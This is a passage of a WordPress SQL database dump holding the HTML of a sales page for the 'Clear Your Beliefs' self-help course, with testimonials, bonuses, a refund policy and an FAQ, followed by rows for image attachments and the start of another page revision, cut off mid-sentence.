love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 18:33:08', '2014-06-17 23:33:08', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(955, 2, '2014-06-17 18:43:27', '2014-06-17 23:43:27', '', 'annular solar eclipse 5-12 New Mexico', '', 'inherit', 'closed', 'open', '', 'annular-solar-eclipse-5-12-new-mexico', '', '', '2014-06-17 18:43:27', '2014-06-17 23:43:27', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/annular-solar-eclipse-5-12-New-Mexico.jpg', 0, 'attachment', 'image/jpeg', 0),
(956, 2, '2014-06-17 18:43:32', '2014-06-17 23:43:32', '', 'boat on spectacular sunset', '', 'inherit', 'closed', 'open', '', 'boat-on-spectacular-sunset', '', '', '2014-06-17 18:43:32', '2014-06-17 23:43:32', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/boat-on-spectacular-sunset.jpg', 0, 'attachment', 'image/jpeg', 0),
(957, 2, '2014-06-17 18:43:35', '2014-06-17 23:43:35', '', 'Brilliant sunset at beach by Noko Mis', '', 'inherit', 'closed', 'open', '', 'brilliant-sunset-at-beach-by-noko-mis', '', '', '2014-06-17 18:43:35', '2014-06-17 23:43:35', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/Brilliant-sunset-at-beach-by-Noko-Mis.jpg', 0, 'attachment', 'image/jpeg', 0),
(958, 2, '2014-06-17 18:43:38', '2014-06-17 23:43:38', '', 'dew umbrella', '', 'inherit', 'closed', 'open', '', 'dew-umbrella', '', '', '2014-06-17 18:43:38', '2014-06-17 23:43:38', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/dew-umbrella.jpg', 0, 'attachment', 'image/jpeg', 0),
(959, 2, '2014-06-17 18:43:39', '2014-06-17 23:43:39', '', 'gazania-flower-photograph', '', 'inherit', 'closed', 'open', '', 'gazania-flower-photograph', '', '', '2014-06-17 18:43:39', '2014-06-17 23:43:39', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/gazania-flower-photograph.jpg', 0, 'attachment', 'image/jpeg', 0),
(960, 2, '2014-06-17 18:43:41', '2014-06-17 23:43:41', '', 'Lenticular 5 layer clouds over mtn', '', 'inherit', 'closed', 'open', '', 'lenticular-5-layer-clouds-over-mtn', '', '', '2014-06-17 18:43:41', '2014-06-17 23:43:41', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/Lenticular-5-layer-clouds-over-mtn.jpg', 0, 'attachment', 'image/jpeg', 0),
(961, 2, '2014-06-17 18:43:43', '2014-06-17 23:43:43', '', 'Lenticular clouds over Ranier', '', 'inherit', 'closed', 'open', '', 'lenticular-clouds-over-ranier', '', '', '2014-06-17 18:43:43', '2014-06-17 23:43:43', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/Lenticular-clouds-over-Ranier.jpg', 0, 'attachment', 'image/jpeg', 0),
(962, 2, '2014-06-17 18:43:45', '2014-06-17 23:43:45', '', 'lotus flower reflected', '', 'inherit', 'closed', 'open', '', 'lotus-flower-reflected', '', '', '2014-06-17 18:43:45', '2014-06-17 23:43:45', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg', 0, 'attachment', 'image/jpeg', 0),
(963, 2, '2014-06-17 18:43:48', '2014-06-17 23:43:48', '', 'Magical Beach', '', 'inherit', 'closed', 'open', '', 'magical-beach', '', '', '2014-06-17 18:43:48', '2014-06-17 23:43:48', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/Magical-Beach.jpg', 0, 'attachment', 'image/jpeg', 0),
(964, 2, '2014-06-17 18:43:50', '2014-06-17 23:43:50', '', 'Moon through Arches National', '', 'inherit', 'closed', 'open', '', 'moon-through-arches-national', '', '', '2014-06-17 18:43:50', '2014-06-17 23:43:50', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/Moon-through-Arches-National.jpg', 0, 'attachment', 'image/jpeg', 0),
(965, 2, '2014-06-17 18:43:52', '2014-06-17 23:43:52', '', 'perfect beach scene', '', 'inherit', 'closed', 'open', '', 'perfect-beach-scene', '', '', '2014-06-17 18:43:52', '2014-06-17 23:43:52', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/perfect-beach-scene.jpg', 0, 'attachment', 'image/jpeg', 0),
(966, 2, '2014-06-17 18:43:55', '2014-06-17 23:43:55', '', 'piuva-tree-brazil-photograph', '', 'inherit', 'closed', 'open', '', 'piuva-tree-brazil-photograph', '', '', '2014-06-17 18:43:55', '2014-06-17 23:43:55', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/piuva-tree-brazil-photograph.jpg', 0, 'attachment', 'image/jpeg', 0),
(967, 2, '2014-06-17 18:43:57', '2014-06-17 23:43:57', '', 'Sea Cave Azores Portugal', '', 'inherit', 'closed', 'open', '', 'sea-cave-azores-portugal', '', '', '2014-06-17 18:43:57', '2014-06-17 23:43:57', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/Sea-Cave-Azores-Portugal.jpg', 0, 'attachment', 'image/jpeg', 0),
(968, 2, '2014-06-17 18:44:00', '2014-06-17 23:44:00', '', 'sky-sun-cloud-radiance', '', 'inherit', 'closed', 'open', '', 'sky-sun-cloud-radiance', '', '', '2014-06-17 18:44:00', '2014-06-17 23:44:00', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/sky-sun-cloud-radiance.jpg', 0, 'attachment', 'image/jpeg', 0),
(969, 2, '2014-06-17 18:44:04', '2014-06-17 23:44:04', '', 'solar radiation', '', 'inherit', 'closed', 'open', '', 'solar-radiation', '', '', '2014-06-17 18:44:04', '2014-06-17 23:44:04', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/solar-radiation.jpg', 0, 'attachment', 'image/jpeg', 0),
(970, 2, '2014-06-17 18:44:05', '2014-06-17 23:44:05', '', 'Stars swirling over mountain', '', 'inherit', 'closed', 'open', '', 'stars-swirling-over-mountain', '', '', '2014-06-17 18:44:05', '2014-06-17 23:44:05', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/Stars-swirling-over-mountain.jpg', 0, 'attachment', 'image/jpeg', 0),
(971, 2, '2014-06-17 18:44:07', '2014-06-17 23:44:07', '', 'sun behind tree', '', 'inherit', 'closed', 'open', '', 'sun-behind-tree', '', '', '2014-06-17 18:44:07', '2014-06-17 23:44:07', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/sun-behind-tree.jpg', 0, 'attachment', 'image/jpeg', 0),
(972, 2, '2014-06-17 18:44:09', '2014-06-17 23:44:09', '', 'water flows around', '', 'inherit', 'closed', 'open', '', 'water-flows-around', '', '', '2014-06-17 18:44:09', '2014-06-17 23:44:09', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/water-flows-around.jpg', 0, 'attachment', 'image/jpeg', 0),
(973, 2, '2014-06-17 18:44:11', '2014-06-17 23:44:11', '', 'wave in full color', '', 'inherit', 'closed', 'open', '', 'wave-in-full-color', '', '', '2014-06-17 18:44:11', '2014-06-17 23:44:11', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/wave-in-full-color.jpg', 0, 'attachment', 'image/jpeg', 0),
(974, 2, '2014-06-17 18:44:12', '2014-06-17 23:44:12', '', 'woman swimming under wave', '', 'inherit', 'closed', 'open', '', 'woman-swimming-under-wave', '', '', '2014-06-17 18:44:12', '2014-06-17 23:44:12', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/woman-swimming-under-wave.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(980, 2, '2014-06-17 19:54:31', '2014-06-18 00:54:31', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and 